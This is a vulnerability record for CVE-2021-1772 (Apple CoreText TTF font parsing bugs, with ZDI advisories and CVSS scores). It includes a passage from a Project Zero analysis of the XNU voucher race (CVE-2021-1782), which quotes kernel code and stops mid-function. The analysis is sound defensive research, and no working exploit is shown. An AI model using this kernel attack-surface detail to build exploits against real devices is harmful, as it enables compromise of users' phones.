A stack overflow was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, watchOS 7.3, tvOS 14.4, iOS 14.4 and iPadOS 14.4. Processing a maliciously crafted text file may lead to arbitrary code execution.
{"zdi": [{"lastseen": "2023-05-27T15:52:08", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. Interaction with the CoreText library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the parsing of TTF fonts. Crafted data in a TTF file can trigger a write past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-02-04T00:00:00", "type": "zdi", "title": "Apple macOS CoreText TTF Parsing Out-of-Bounds Write Remote Code Execution", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1772"], "modified": "2021-02-04T00:00:00", "id": "ZDI-21-149", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-149/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:48:22", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. Interaction with the CoreText library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the parsing of TTF fonts. A crafted TTF font can trigger an overflow of a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-25T00:00:00", "type": "zdi", "title": "Apple macOS CoreText TTF Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1772"], "modified": "2021-06-25T00:00:00", "id": "ZDI-21-758", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-758/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2023-05-28T02:00:41", "description": "Posted by Ian Beer, Google Project Zero\n\nThis blog post is my analysis of a vulnerability exploited in the wild and patched in early 2021. Like the [writeup published last week](<https://googleprojectzero.blogspot.com/2022/04/cve-2021-30737-xerubs-2021-ios-asn1.html>) looking at an ASN.1 parser bug, this blog post is based on the notes I took as I was analyzing the patch and trying to understand the XNU vouchers subsystem. I hope that this writeup serves as the missing documentation for how some of the internals of the voucher subsystem works and its quirks which lead to this vulnerability.\n\nCVE-2021-1782 was fixed in iOS 14.4, as noted by [@s1guza on twitter](<https://twitter.com/s1guza/status/1354575808547999744>):\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTx_FjnSHTtPtnk2F1K8-AYcTnVrIBNV8PNJQgZCOhfoIvU6hD7teqA3Jmb8T8KtIpnIYKuUqa28P-pt-yM2zUsWppkcmdx18pAP8r0XTQH4JHAhpNZkC2uALpz_Pn5_OXK3mXlblNG1i6TIEtLsksgez8GlLTi2zuxP0haGXzaU1XGEj2RQeNjOto/s1182/image1%20%283%29%281%29.png>)\n\nThis vulnerability was fixed on January 26th 2021, and Apple updated the iOS 14.4 release notes on May 28th 2021 to indicate that the issue may have been actively exploited:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz_bD89bznHVJLkW_Kbwy-1JEoHaUyMfeaqDbpVjRTQ366r8ywGgSGps2aPyFa05wBuKWqAi2hJmm76dnbcgoV4YCFug4UWu3OhkHPgKjg6coamg35AId8VsOw5gkIHldyvefgRSX0klbhJ275wnwri6dzSTb_OZwwz2LeUeVjmHIAPsyirypsYonn/s1660/image2%20%282%29%281%29.png>)\n\n## Vouchers\n\nWhat exactly is a voucher?\n\nThe kernel code has a concise description:\n\nVouchers are a reference counted immutable (once-created) set of indexes to particular resource manager attribute values (which themselves are reference counted).\n\nThat definition is technically correct, though perhaps not all that helpful by itself.\n\nTo actually understand the root cause and exploitability of this vulnerability is going to require covering a lot of the voucher codebase. This part of XNU is pretty obscure, and pretty complicated.\n\nA voucher is a reference-counted table of keys and values. Pointers to all created vouchers are stored in the global ivht_bucket hash table.\n\nFor a particular set of keys and values there should only be one voucher object. During the creation of a voucher there is a deduplication stage where the new voucher is compared against all existing vouchers in the hashtable to ensure they remain unique, returning a reference to the existing voucher if a duplicate has been found.\n\nHere's the structure of a voucher:\n\nstruct ipc_voucher {\n\niv_index_t iv_hash; /* checksum hash */\n\niv_index_t iv_sum; /* checksum of values */\n\nos_refcnt_t iv_refs; /* reference count */\n\niv_index_t iv_table_size; /* size of the voucher table */\n\niv_index_t iv_inline_table[IV_ENTRIES_INLINE];\n\niv_entry_t iv_table; /* table of voucher attr entries */\n\nipc_port_t iv_port; /* port representing the voucher */\n\nqueue_chain_t iv_hash_link; /* link on hash chain */\n\n};\n\n#define IV_ENTRIES_INLINE MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN \n \n--- \n \nThe voucher codebase is written in a very generic, extensible way, even though its actual use and supported feature set is quite minimal.\n\n## Keys\n\nKeys in vouchers are not arbitrary. Keys are indexes into a voucher's iv_table; a value's position in the iv_table table determines what \"key\" it was stored under. Whilst the vouchers codebase supports the runtime addition of new key types this feature isn't used and there are just a small number of fixed, well-known keys:\n\n#define MACH_VOUCHER_ATTR_KEY_ALL ((mach_voucher_attr_key_t)~0)\n\n#define MACH_VOUCHER_ATTR_KEY_NONE ((mach_voucher_attr_key_t)0)\n\n/* other well-known-keys will be added here */\n\n#define MACH_VOUCHER_ATTR_KEY_ATM ((mach_voucher_attr_key_t)1)\n\n#define MACH_VOUCHER_ATTR_KEY_IMPORTANCE ((mach_voucher_attr_key_t)2)\n\n#define MACH_VOUCHER_ATTR_KEY_BANK ((mach_voucher_attr_key_t)3)\n\n#define MACH_VOUCHER_ATTR_KEY_PTHPRIORITY ((mach_voucher_attr_key_t)4)\n\n#define MACH_VOUCHER_ATTR_KEY_USER_DATA ((mach_voucher_attr_key_t)7)\n\n#define MACH_VOUCHER_ATTR_KEY_TEST ((mach_voucher_attr_key_t)8)\n\n#define MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN MACH_VOUCHER_ATTR_KEY_TEST \n \n--- \n \nThe iv_inline_table in an ipc_voucher has 8 entries. But of those, only four are actually supported and have any associated functionality. The ATM voucher attributes are deprecated and the code supporting them is gone so only IMPORTANCE (2), BANK (3), PTHPRIORITY (4) and USER_DATA (7) are valid keys. There's some confusion (perhaps on my part) about when exactly you should use the term key and when attribute; I'll use them interchangeably to refer to these key values and the corresponding \"types\" of values which they manage. More on that later.\n\n## Values\n\nEach entry in a voucher iv_table is an iv_index_t:\n\ntypedef natural_t iv_index_t; \n \n--- \n \nEach value is again an index; this time into a per-key cache of values, abstracted as a \"Voucher Attribute Cache Control Object\" represented by this structure:\n\nstruct ipc_voucher_attr_control {\n\nos_refcnt_t ivac_refs;\n\nboolean_t ivac_is_growing; /* is the table being grown */\n\nivac_entry_t ivac_table; /* table of voucher attr value entries */\n\niv_index_t ivac_table_size; /* size of the attr value table */\n\niv_index_t ivac_init_table_size; /* size of the attr value table */\n\niv_index_t ivac_freelist; /* index of the first free element */\n\nipc_port_t ivac_port; /* port for accessing the cache control */\n\nlck_spin_t ivac_lock_data;\n\niv_index_t ivac_key_index; /* key index for this value */\n\n}; \n \n--- \n \nThese are accessed indirectly via another global table:\n\nstatic ipc_voucher_global_table_element iv_global_table[MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN]; \n \n--- \n \n(Again, the comments in the code indicate that in the future that this table may grow in size and allow attributes to be managed in userspace, but for now it's just a fixed size array.)\n\nEach element in that table has this structure:\n\ntypedef struct ipc_voucher_global_table_element {\n\nipc_voucher_attr_manager_t ivgte_manager;\n\nipc_voucher_attr_control_t ivgte_control;\n\nmach_voucher_attr_key_t ivgte_key;\n\n} ipc_voucher_global_table_element; \n \n--- \n \nBoth the iv_global_table and each voucher's iv_table are indexed by (key-1), not key, so the userdata entry is [6], not [7], even though the array still has 8 entries.\n\nThe ipc_voucher_attr_control_t provides an abstract interface for managing \"values\" and the ipc_voucher_attr_manager_t provides the \"type-specific\" logic to implement the semantics of each type (here by type I mean \"key\" or \"attr\" type.) Let's look more concretely at what that means. Here's the definition of ipc_voucher_attr_manager_t:\n\nstruct ipc_voucher_attr_manager {\n\nipc_voucher_attr_manager_release_value_t ivam_release_value;\n\nipc_voucher_attr_manager_get_value_t ivam_get_value;\n\nipc_voucher_attr_manager_extract_content_t ivam_extract_content;\n\nipc_voucher_attr_manager_command_t ivam_command;\n\nipc_voucher_attr_manager_release_t ivam_release;\n\nipc_voucher_attr_manager_flags ivam_flags;\n\n}; \n \n--- \n \nivam_flags is an int containing some flags; the other five fields are function pointers which define the semantics of the particular attr type. Here's the ipc_voucher_attr_manager structure for the user_data type:\n\nconst struct ipc_voucher_attr_manager user_data_manager = {\n\n.ivam_release_value = user_data_release_value,\n\n.ivam_get_value = user_data_get_value,\n\n.ivam_extract_content = user_data_extract_content,\n\n.ivam_command = user_data_command,\n\n.ivam_release = user_data_release,\n\n.ivam_flags = IVAM_FLAGS_NONE,\n\n}; \n \n--- \n \nThose five function pointers are the only interface from the generic voucher code into the type-specific code. The interface may seem simple but there are some tricky subtleties in there; we'll get to that later!\n\nLet's go back to the generic ipc_voucher_attr_control structure which maintains the \"values\" for each key in a type-agnostic way. The most important field is ivac_entry_t ivac_table, which is an array of ivac_entry_s's. It's an index into this table which is stored in each voucher's iv_table.\n\nHere's the structure of each entry in that table:\n\nstruct ivac_entry_s {\n\niv_value_handle_t ivace_value;\n\niv_value_refs_t ivace_layered:1, /* layered effective entry */\n\nivace_releasing:1, /* release in progress */\n\nivace_free:1, /* on freelist */\n\nivace_persist:1, /* Persist the entry, don't\n\ncount made refs */\n\nivace_refs:28; /* reference count */\n\nunion {\n\niv_value_refs_t ivaceu_made; /* made count (non-layered) */\n\niv_index_t ivaceu_layer; /* next effective layer\n\n(layered) */\n\n} ivace_u;\n\niv_index_t ivace_next; /* hash or freelist */\n\niv_index_t ivace_index; /* hash head (independent) */\n\n}; \n \n--- \n \nivace_refs is a reference count for this table index. Note that this entry is inline in an array; so this reference count going to zero doesn't cause the ivac_entry_s to be free'd back to a kernel allocator (like the zone allocator for example.) Instead, it moves this table index onto a freelist of empty entries. The table can grow but never shrink.\n\nTable entries which aren't free store a type-specific \"handle\" in ivace_value. Here's the typedef chain for that type:\n\niv_value_handle_t ivace_value\n\ntypedef mach_voucher_attr_value_handle_t iv_value_handle_t;\n\ntypedef uint64_t mach_voucher_attr_value_handle_t; \n \n--- \n \nThe handle is a uint64_t but in reality the attrs can (and do) store pointers there, hidden behind casts.\n\nA guarantee made by the attr_control is that there will only ever be one (live) ivac_entry_s for a particular ivace_value. This means that each time a new ivace_value needs an ivac_entry the attr_control's ivac_table needs to be searched to see if a matching value is already present. To speed this up in-use ivac_entries are linked together in hash buckets so that a (hopefully significantly) shorter linked-list of entries can be searched rather than a linear scan of the whole table. (Note that it's not a linked-list of pointers; each link in the chain is an index into the table.)\n\n## Userdata attrs\n\nuser_data is one of the four types of supported, implemented voucher attr types. It's only purpose is to manage buffers of arbitrary, user controlled data. Since the attr_control performs deduping only on the ivace_value (which is a pointer) the userdata attr manager is responsible for ensuring that userdata values which have identical buffer values (matching length and bytes) have identical pointers.\n\nTo do this it maintains a hash table of user_data_value_element structures, which wrap a variable-sized buffer of bytes:\n\nstruct user_data_value_element {\n\nmach_voucher_attr_value_reference_t e_made;\n\nmach_voucher_attr_content_size_t e_size;\n\niv_index_t e_sum;\n\niv_index_t e_hash;\n\nqueue_chain_t e_hash_link;\n\nuint8_t e_data[];\n\n}; \n \n--- \n \nEach inline e_data buffer can be up to 16KB. e_hash_link stores the hash-table bucket list pointer.\n\ne_made is not a simple reference count. Looking through the code you'll notice that there are no places where it's ever decremented. Since there should (nearly) always be a 1:1 mapping between an ivace_entry and a user_data_value_element this structure shouldn't need to be reference counted. There is however one very fiddly race condition (which isn't the race condition which causes the vulnerability!) which necessitates the e_made field. This race condition is sort-of documented and we'll get there eventually...\n\n## Recipes\n\nThe host_create_mach_voucher host port MIG ([Mach Interface Generator](<https://www.nextop.de/NeXTstep_3.3_Developer_Documentation/OperatingSystem/Part1_Mach/02_Messages/Messages.htmld/index.html>)) method is the userspace interface for creating vouchers:\n\nkern_return_t\n\nhost_create_mach_voucher(mach_port_name_t host,\n\nmach_voucher_attr_raw_recipe_array_t recipes,\n\nmach_voucher_attr_recipe_size_t recipesCnt,\n\nmach_port_name_t *voucher); \n \n--- \n \nrecipes points to a buffer filled with a sequence of packed variable-size mach_voucher_attr_recipe_data structures:\n\ntypedef struct mach_voucher_attr_recipe_data {\n\nmach_voucher_attr_key_t key;\n\nmach_voucher_attr_recipe_command_t command;\n\nmach_voucher_name_t previous_voucher;\n\nmach_voucher_attr_content_size_t content_size;\n\nuint8_t content[];\n\n} mach_voucher_attr_recipe_data_t; \n \n--- \n \nkey is one of the four supported voucher attr types we've seen before (importance, bank, pthread_priority and user_data) or a wildcard value (MACH_VOUCHER_ATTR_KEY_ALL) indicating that the command should apply to all keys. There are a number of generic commands as well as type-specific commands. Commands can optionally refer to existing vouchers via the previous_voucher field, which should name a voucher port.\n\nHere are the supported generic commands for voucher creation:\n\nMACH_VOUCHER_ATTR_COPY: copy the attr value from the previous voucher. You can specify the wildcard key to copy all the attr values from the previous voucher.\n\nMACH_VOUCHER_ATTR_REMOVE: remove the specified attr value from the voucher under construction. This can also remove all the attributes from the voucher under construction (which, arguably, makes no sense.)\n\nMACH_VOUCHER_ATTR_SET_VALUE_HANDLE: this command is only valid for kernel clients; it allows the caller to specify an arbitrary ivace_value, which doesn't make sense for userspace and shouldn't be reachable.\n\nMACH_VOUCHER_ATTR_REDEEM: the semantics of redeeming an attribute from a previous voucher are not defined by the voucher code; it's up to the individual managers to determine what that might mean.\n\nHere are the attr-specific commands for voucher creation for each type:\n\nbank:\n\nMACH_VOUCHER_ATTR_BANK_CREATE\n\nMACH_VOUCHER_ATTR_BANK_MODIFY_PERSONA\n\nMACH_VOUCHER_ATTR_AUTO_REDEEM\n\nMACH_VOUCHER_ATTR_SEND_PREPROCESS\n\nimportance:\n\nMACH_VOUCHER_ATTR_IMPORTANCE_SELF\n\nuser_data:\n\nMACH_VOUCHER_ATTR_USER_DATA_STORE\n\npthread_priority:\n\nMACH_VOUCHER_ATTR_PTHPRIORITY_CREATE\n\nNote that there are further commands which can be \"executed against\" vouchers via the mach_voucher_attr_command MIG method which calls the attr manager's ivam_command function pointer. Those are:\n\nbank:\n\nBANK_ORIGINATOR_PID\n\nBANK_PERSONA_TOKEN\n\nBANK_PERSONA_ID\n\nimportance:\n\nMACH_VOUCHER_IMPORTANCE_ATTR_DROP_EXTERNAL\n\nuser_data:\n\nnone\n\npthread_priority:\n\nnone\n\nLet's look at example recipe for creating a voucher with a single user_data attr, consisting of the 4 bytes {0x41, 0x41, 0x41, 0x41}:\n\nstruct udata_dword_recipe {\n\nmach_voucher_attr_recipe_data_t recipe;\n\nuint32_t payload;\n\n};\n\nstruct udata_dword_recipe r = {0};\n\nr.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;\n\nr.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;\n\nr.recipe.content_size = sizeof(uint32_t);\n\nr.payload = 0x41414141; \n \n--- \n \nLet's follow the path of this recipe in detail.\n\nHere's the most important part of host_create_mach_voucher showing the three high-level phases: voucher allocation, attribute creation and voucher de-duping. It's not the responsibility of this code to find or allocate a mach port for the voucher; that's done by the MIG layer code.\n\n/* allocate new voucher */\n\nvoucher = iv_alloc(ivgt_keys_in_use);\n\nif (IV_NULL == voucher) {\n\nreturn KERN_RESOURCE_SHORTAGE;\n\n}\n\n/* iterate over the recipe items */\n\nwhile (0 < recipe_size - recipe_used) {\n\nipc_voucher_t prev_iv;\n\nif (recipe_size - recipe_used < sizeof(*sub_recipe)) {\n\nkr = KERN_INVALID_ARGUMENT;\n\nbreak;\n\n}\n\n/* find the next recipe */\n\nsub_recipe =\n\n(mach_voucher_attr_recipe_t)(void *)&recipes[recipe_used];\n\nif (recipe_size - recipe_used - sizeof(*sub_recipe) <\n\nsub_recipe->content_size) {\n\nkr = KERN_INVALID_ARGUMENT;\n\nbreak;\n\n}\n\nrecipe_used += sizeof(*sub_recipe) + sub_recipe->content_size;\n\n/* convert voucher port name (current space) */\n\n/* into a voucher reference */\n\nprev_iv =\n\nconvert_port_name_to_voucher(sub_recipe->previous_voucher);\n\nif (MACH_PORT_NULL != sub_recipe->previous_voucher &&\n\nIV_NULL == prev_iv) {\n\nkr = KERN_INVALID_CAPABILITY;\n\nbreak;\n\n}\n\nkr = ipc_execute_voucher_recipe_command(\n\nvoucher,\n\nsub_recipe->key,\n\nsub_recipe->command,\n\nprev_iv,\n\nsub_recipe->content,\n\nsub_recipe->content_size,\n\nFALSE);\n\nipc_voucher_release(prev_iv);\n\nif (KERN_SUCCESS != kr) {\n\nbreak;\n\n}\n\n}\n\nif (KERN_SUCCESS == kr) {\n\n*new_voucher = iv_dedup(voucher);\n\n} else {\n\n*new_voucher = IV_NULL;\n\niv_dealloc(voucher, FALSE);\n\n} \n \n--- \n \nAt the top of this snippet a new voucher is allocated in iv_alloc. ipc_execute_voucher_recipe_command is then called in a loop to consume however many sub-recipe structures were provided by userspace. Each sub-recipe can optionally refer to an existing voucher via the sub-recipe previous_voucher field. Note that MIG doesn't natively support variable-sized structures containing ports so it's passed as a mach port name which is looked up in the calling task's mach port namespace and converted to a voucher reference by convert_port_name_to_voucher. The intended functionality here is to be able to refer to attrs in other vouchers to copy or \"redeem\" them. As discussed, the semantics of redeeming a voucher attr isn't defined by the abstract voucher code and it's up to the individual attr managers to decide what that means.\n\nOnce the entire recipe has been consumed and all the iv_table entries filled in, iv_dedup then searches the ivht_bucket hash table to see if there's an existing voucher with a matching set of attributes. Remember that each attribute value stored in a voucher is an index into the attribute controller's attribute table; and those attributes are unique, so it suffices to simply compare the array of voucher indexes to determine whether all attribute values are equal. If a matching voucher is found, iv_dedup returns a reference to the existing voucher and calls iv_dealloc to free the newly created newly-created voucher. Otherwise, if no existing, matching voucher is found, iv_dedup adds the newly created voucher to the ivht_bucket hash table.\n\nLet's look at ipc_execute_voucher_recipe_command which is responsible for filling in the requested entries in the voucher iv_table. Note that key and command are arbitrary, controlled dwords. content is a pointer to a buffer of controlled bytes, and content_size is the correct size of that input buffer. The MIG layer limits the overall input size of the recipe (which is a collection of sub-recipes) to 5260 bytes, and any input content buffers would have to fit in there.\n\nstatic kern_return_t\n\nipc_execute_voucher_recipe_command(\n\nipc_voucher_t voucher,\n\nmach_voucher_attr_key_t key,\n\nmach_voucher_attr_recipe_command_t command,\n\nipc_voucher_t prev_iv,\n\nmach_voucher_attr_content_t content,\n\nmach_voucher_attr_content_size_t content_size,\n\nboolean_t key_priv)\n\n{\n\niv_index_t prev_val_index;\n\niv_index_t val_index;\n\nkern_return_t kr;\n\nswitch (command) { \n \n--- \n \nMACH_VOUCHER_ATTR_USER_DATA_STORE isn't one of the switch statement case values here so the code falls through to the default case:\n\ndefault:\n\nkr = ipc_replace_voucher_value(voucher,\n\nkey,\n\ncommand,\n\nprev_iv,\n\ncontent,\n\ncontent_size);\n\nif (KERN_SUCCESS != kr) {\n\nreturn kr;\n\n}\n\nbreak;\n\n}\n\nreturn KERN_SUCCESS; \n \n--- \n \nHere's that code:\n\nstatic kern_return_t\n\nipc_replace_voucher_value(\n\nipc_voucher_t voucher,\n\nmach_voucher_attr_key_t key,\n\nmach_voucher_attr_recipe_command_t command,\n\nipc_voucher_t prev_voucher,\n\nmach_voucher_attr_content_t content,\n\nmach_voucher_attr_content_size_t content_size)\n\n{\n\n...\n\n/*\n\n* Get the manager for this key_index.\n\n* Returns a reference on the control.\n\n*/\n\nkey_index = iv_key_to_index(key);\n\nivgt_lookup(key_index, TRUE, &ivam, &ivac);\n\nif (IVAM_NULL == ivam) {\n\nreturn KERN_INVALID_ARGUMENT;\n\n}\n\n.. \n \n--- \n \niv_key_to_index just subtracts 1 from key (assuming it's valid and not MACH_VOUCHER_ATRR_KEY_ALL):\n\nstatic inline iv_index_t\n\niv_key_to_index(mach_voucher_attr_key_t key)\n\n{\n\nif (MACH_VOUCHER_ATTR_KEY_ALL == key ||\n\nMACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN < key) {\n\nreturn IV_UNUSED_KEYINDEX;\n\n}\n\nreturn (iv_index_t)key - 1;\n\n} \n \n--- \n \nivgt_lookup then gets a reference on that key's attr manager and attr controller. The manager is really just a bunch of function pointers which define the semantics of what different \"key types\" actually mean; and the controller stores (and caches) values for those keys.\n\nLet's keep reading ipc_replace_voucher_value. Here's the next statement:\n\n/* save the current value stored in the forming voucher */\n\nsave_val_index = iv_lookup(voucher, key_index); \n \n--- \n \nThis point is important for getting a good feeling for how the voucher code is supposed to work; recipes can refer not only to other vouchers (via the previous_voucher port) but they can also refer to themselves during creation. You don't have to have just one sub-recipe per attr type for which you wish to have a value in your voucher; you can specify multiple sub-recipes for that type. Does it actually make any sense to do that? Well, luckily for the security researcher we don't have to worry about whether functionality actually makes any sense; it's all just a weird machine to us! (There's allusions in the code to future functionality where attribute values can be \"layered\" or \"linked\" but for now such functionality doesn't exist.)\n\niv_lookup returns the \"value index\" for the given key in the particular voucher. That means it just returns the iv_index_t in the iv_table of the given voucher:\n\nstatic inline iv_index_t\n\niv_lookup(ipc_voucher_t iv, iv_index_t key_index)\n\n{\n\nif (key_index < iv->iv_table_size) {\n\nreturn iv->iv_table[key_index];\n\n}\n\nreturn IV_UNUSED_VALINDEX;\n\n} \n \n--- \n \nThis value index uniquely identifies an existing attribute value, but you need to ask the attribute's controller for the actual value. Before getting that previous value though, the code first determines whether this sub-recipe might be trying to refer to the value currently stored by this voucher or has explicitly passed in a previous_voucher. The value in the previous voucher takes precedence over whatever is already in the under-construction voucher.\n\nprev_val_index = (IV_NULL != prev_voucher) ?\n\niv_lookup(prev_voucher, key_index) :\n\nsave_val_index; \n \n--- \n \nThen the code looks up the actual previous value to operate on:\n\nivace_lookup_values(key_index, prev_val_index,\n\nprevious_vals, &previous_vals_count); \n \n--- \n \nkey_index is the key we're operating on, MACH_VOUCHER_ATTR_KEY_USER_DATA in this example. This function is called ivace_lookup_values (note the plural). There are some comments in the voucher code indicating that maybe in the future values could themselves be put into a linked-list such that you could have larger values (or layered/chained values.) But this functionality isn't implemented; ivace_lookup_values will only ever return 1 value.\n\nHere's ivace_lookup_values:\n\nstatic void\n\nivace_lookup_values(\n\niv_index_t key_index,\n\niv_index_t value_index,\n\nmach_voucher_attr_value_handle_array_t values,\n\nmach_voucher_attr_value_handle_array_size_t *count)\n\n{\n\nipc_voucher_attr_control_t ivac;\n\nivac_entry_t ivace;\n\nif (IV_UNUSED_VALINDEX == value_index ||\n\nMACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN <= key_index) {\n\n*count = 0;\n\nreturn;\n\n}\n\nivac = iv_global_table[key_index].ivgte_control;\n\nassert(IVAC_NULL != ivac);\n\n/*\n\n* Get the entry and then the linked values.\n\n*/\n\nivac_lock(ivac);\n\nassert(value_index < ivac->ivac_table_size);\n\nivace = &ivac->ivac_table[value_index];\n\n/*\n\n* TODO: support chained values (for effective vouchers).\n\n*/\n\nassert(ivace->ivace_refs > 0);\n\nvalues[0] = ivace->ivace_value;\n\nivac_unlock(ivac);\n\n*count = 1;\n\n} \n \n--- \n \nThe locking used in the vouchers code is very important for properly understanding the underlying vulnerability when we eventually get there, but for now I'm glossing over it and we'll return to examine the relevant locks when necessary.\n\nLet's discuss the ivace_lookup_values code. They index the iv_global_table to get a pointer to the attribute type's controller:\n\nivac = iv_global_table[key_index].ivgte_control; \n \n--- \n \nThey take that controller's lock then index its ivac_table to find that value's struct ivac_entry_s and read the ivace_value value from there:\n\nivac_lock(ivac);\n\nassert(value_index < ivac->ivac_table_size);\n\nivace = &ivac->ivac_table[value_index];\n\nassert(ivace->ivace_refs > 0);\n\nvalues[0] = ivace->ivace_value;\n\nivac_unlock(ivac);\n\n*count = 1; \n \n--- \n \nLet's go back to the calling function (ipc_replace_voucher_value) and keep reading:\n\n/* Call out to resource manager to get new value */\n\nnew_value_voucher = IV_NULL;\n\nkr = (ivam->ivam_get_value)(\n\nivam, key, command,\n\nprevious_vals, previous_vals_count,\n\ncontent, content_size,\n\n&new_value, &new_flag, &new_value_voucher);\n\nif (KERN_SUCCESS != kr) {\n\nivac_release(ivac);\n\nreturn kr;\n\n} \n \n--- \n \nivam->ivam_get_value is calling the attribute type's function pointer which defines the meaning for the particular type of \"get_value\". The term get_value here is a little confusing; aren't we trying to store a new value? (and there's no subsequent call to a method like \"store_value\".) A better way to think about the semantics of get_value is that it's meant to evaluate both previous_vals (either the value from previous_voucher or the value currently in this voucher) and content (the arbitrary byte buffer from this sub-recipe) and combine/evaluate them to create a value representation. It's then up to the controller layer to store/cache that value. (Actually there's one tedious snag in this system which we'll get to involving locking...)\n\nivam_get_value for the user_data attribute type is user_data_get_value:\n\nstatic kern_return_t\n\nuser_data_get_value(\n\nipc_voucher_attr_manager_t __assert_only manager,\n\nmach_voucher_attr_key_t __assert_only key,\n\nmach_voucher_attr_recipe_command_t command,\n\nmach_voucher_attr_value_handle_array_t prev_values,\n\nmach_voucher_attr_value_handle_array_size_t prev_value_count,\n\nmach_voucher_attr_content_t content,\n\nmach_voucher_attr_content_size_t content_size,\n\nmach_voucher_attr_value_handle_t *out_value,\n\nmach_voucher_attr_value_flags_t *out_flags,\n\nipc_voucher_t *out_value_voucher)\n\n{\n\nuser_data_element_t elem;\n\nassert(&user_data_manager == manager);\n\nUSER_DATA_ASSERT_KEY(key);\n\n/* never an out voucher */\n\n*out_value_voucher = IPC_VOUCHER_NULL;\n\n*out_flags = MACH_VOUCHER_ATTR_VALUE_FLAGS_NONE;\n\nswitch (command) {\n\ncase MACH_VOUCHER_ATTR_REDEEM:\n\n/* redeem of previous values is the value */\n\nif (0 < prev_value_count) {\n\nelem = (user_data_element_t)prev_values[0];\n\nassert(0 < elem->e_made);\n\nelem->e_made++;\n\n*out_value = prev_values[0];\n\nreturn KERN_SUCCESS;\n\n}\n\n/* redeem of default is default */\n\n*out_value = 0;\n\nreturn KERN_SUCCESS;\n\ncase MACH_VOUCHER_ATTR_USER_DATA_STORE:\n\nif (USER_DATA_MAX_DATA < content_size) {\n\nreturn KERN_RESOURCE_SHORTAGE;\n\n}\n\n/* empty is the default */\n\nif (0 == content_size) {\n\n*out_value = 0;\n\nreturn KERN_SUCCESS;\n\n}\n\nelem = user_data_dedup(content, content_size);\n\n*out_value = (mach_voucher_attr_value_handle_t)elem;\n\nreturn KERN_SUCCESS;\n\ndefault:\n\n/* every other command is unknown */\n\nreturn KERN_INVALID_ARGUMENT;\n\n}\n\n} \n \n--- \n \nLet's look at the MACH_VOUCHER_ATTR_USER_DATA_STORE case, which is the command we put in our single sub-recipe. (The vulnerability is in the MACH_VOUCHER_ATTR_REDEEM code above but we need a lot more background before we get to that.) In the MACH_VOUCHER_ATTR_USER_DATA_STORE case the input arbitrary byte buffer is passed to user_data_dedup, then that return value is returned as the value of out_value. Here's user_data_dedup:\n\nstatic user_data_element_t\n\nuser_data_dedup(\n\nmach_voucher_attr_content_t content,\n\nmach_voucher_attr_content_size_t content_size)\n\n{\n\niv_index_t sum;\n\niv_index_t hash;\n\nuser_data_element_t elem;\n\nuser_data_element_t alloc = NULL;\n\nsum = user_data_checksum(content, content_size);\n\nhash = USER_DATA_HASH_BUCKET(sum);\n\nretry:\n\nuser_data_lock();\n\nqueue_iterate(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link) {\n\nassert(elem->e_hash == hash);\n\n/* if sums match... */\n\nif (elem->e_sum == sum && 